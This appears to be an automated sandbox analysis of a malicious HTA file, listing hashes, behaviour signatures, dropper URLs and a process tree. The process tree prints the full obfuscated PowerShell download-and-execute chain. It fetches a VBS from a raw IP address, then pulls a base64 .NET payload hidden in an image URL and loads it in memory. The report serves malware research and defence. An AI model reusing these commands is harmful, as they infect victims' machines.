Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-01-2025 05:19

General

  • Target

    verynicegirlwalkingarounftheworldmuuuah.hta

  • Size

    47KB

  • MD5

    6dc778742c1403851ff2659fcee24150

  • SHA1

    7cc386b4ddf71303ed5a42a3ba8c8c8404ff5660

  • SHA256

    ba54736b563266fd4f32553c63737596d3208a9112cb47d6513f68db2c2e6b67

  • SHA512

    a897d85c10a466c4c0c964df03692401e53fe22d55f0aac47c0eb569573f68fa0cb5e9781679b318d626fdb9d7114a16a610c9b2840ab3b7dfd17f7ba93e1421

  • SSDEEP

    384:3JOmk0yZAx8XKnnNXIsvZDmjbSu7lvRvw:3smyA+XeYJ1RZ4

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg%20

exe.dropper

https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg%20

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verynicegirlwalkingarounftheworldmuuuah.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-8brjxee.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB655.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB654.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2836
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:852
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1388

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\-8brjxee.dll

    Filesize

    3KB

    MD5

    e01587dd2361db7f598541681ae03f81

    SHA1

    2794afca03a3e2b094bb9c016919fa2d5ce685b0

    SHA256

    ebdb2f049d2ade6481b1a3d986606fae7b84be4a87b86d33ae9c958fedaaccca

    SHA512

    9ba1f94841324ce0e2f790a6250c4a75224df888d139995f65f529bb819be765c460a493e2e7e3a78a6dc560105764033a2fe26b5505eee03f175670b24bbf9b

  • C:\Users\Admin\AppData\Local\Temp\-8brjxee.pdb

    Filesize

    7KB

    MD5

    4586b8223630199c6524a9831de0fc8e

    SHA1

    29c040fc9e2f3ddcc3f767dbc99f9491c7c60c13

    SHA256

    9a6237fdb2195bec881a2e9033145b051307632d60af66e6aee7794fb602620d

    SHA512

    bc2f17ff44f5fe1505f8a106431621c861cb3d8b69dcc59606568f6dfb9cd13fb3a3536c9b7654fda215e46afacb7c874c22ed966ddfba03811600d7147afd5f

  • C:\Users\Admin\AppData\Local\Temp\Cab6200.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESB655.tmp

    Filesize

    1KB

    MD5

    a2fc066c9377445b2c72e881f247aaea

    SHA1

    90c7cb464407818fa614756e99653cfbc14c221c

    SHA256

    c30b7afe01316ab789d374a834792d6e04f387cb0fe5ef51bee0feadc2653844

    SHA512

    c4f7197906dcc09e4679d7c0ab2f683b7cdbea8fdc1b8a2f6f2ce6e50857e1b925730e1b923d79905fc37fa96fddffcc798ddb9a214e18fdbe618bb29bbe14f3

  • C:\Users\Admin\AppData\Local\Temp\Tar6222.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E86R2YACP6QBE8IF39N4.temp

    Filesize

    7KB

    MD5

    b60dda1cb5eb74267661194778ae49f1

    SHA1

    059b68dc735c1759cbd26d9ea9822aff66de1f48

    SHA256

    1661c17f8c70693811dee57b31c86d027f2021fe6279b69c3f6cd2891ed7d86a

    SHA512

    e95b8467a19cc3a4e744238bee0bf5466f575784fb7789f89375060bb6967ac17016b2556340593ead6a60fa35133500dc2cc2b052ed35a309bb3f0816fe6c94

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    7d909ac9059bbee3c32d6447bad8cd6f

    SHA1

    17d814113a023b1b4f7436ecd8ab97dd37218b7b

    SHA256

    6f773de7ca0f626b628cbb7ba2bd4085662420dc5b501d0b502f5ebfda23057d

    SHA512

    a046922e80f9ceba3a5ab82b9193de757f49a11d8332453babdabde0a3b69f2eb52eeeea458b8f6142e464924dcfbf18ef137ad29231c156d0a76f8d53d0f234

  • C:\Users\Admin\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS

    Filesize

    229KB

    MD5

    28ea1c4f19651ab6cfd1828943bd7913

    SHA1

    03fc2176b4bb04fd903c217edd487efef0dd9505

    SHA256

    9700962bc78cf83f0d780d391cfb1276490b0972d826424cd3631bdf78b24968

    SHA512

    7c0479ccd140b149f8234171f53c4fde63c7d27e007c8bf3ff3ecd1389954d87f53f69845025d2762292195bd0fd33264e3cc39df00d7cb8003fd5210ce7e694

  • \??\c:\Users\Admin\AppData\Local\Temp\-8brjxee.0.cs

    Filesize

    472B

    MD5

    0e78a3764ec34c2c2e3c81c978660c95

    SHA1

    a8f89051d487578cc173f3fdfa512247a9c766e8

    SHA256

    6ac8f316d174fada84aacee4991d18807ff23b2dd66a64acc54d3df8a713bd91

    SHA512

    7b69d7b4e8878531a8f1c2574ba445d4f58f9c50fb21065b6214c23a6961173c83de177a8b6cc2bf4d7928d5c7a10e11c26e8108dcf483c3761dd10911b887a4

  • \??\c:\Users\Admin\AppData\Local\Temp\-8brjxee.cmdline

    Filesize

    309B

    MD5

    cd8c1aa618b6ae7f7a56cd1c1768b30a

    SHA1

    cbd76e80a8ddd3fb8dd79874a3605b4820ace271

    SHA256

    a4f4608e9039c8673626f1694035db2c90244a79ff918cc043300c893cf86e8c

    SHA512

    b8704bcf18e77ef0ccb59576c525f755e91d92bfe2c0bedcb4314d87c27df82cc826cd3d995d842d40093d1e02065c5643e570db3955d4014332b314f62a8c93

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCB654.tmp

    Filesize

    652B

    MD5

    b3d4d88dd908e01e871c079df015dcae

    SHA1

    5b5698ad1440cd94749356d07c79866aede13dfc

    SHA256

    403c86ba39d2e506f5d804580de75dbc4e9e7601d8b0ba3574a6c09b79228de0

    SHA512

    b6eca22af6803d6dfb52d9ea83b8e15d6d97139ad6ab3996c933209edd9a3d80b35ed37855af6cadc14d4f4bb96f9f9fe84658fe8f30772ab09b3c29e82ae6de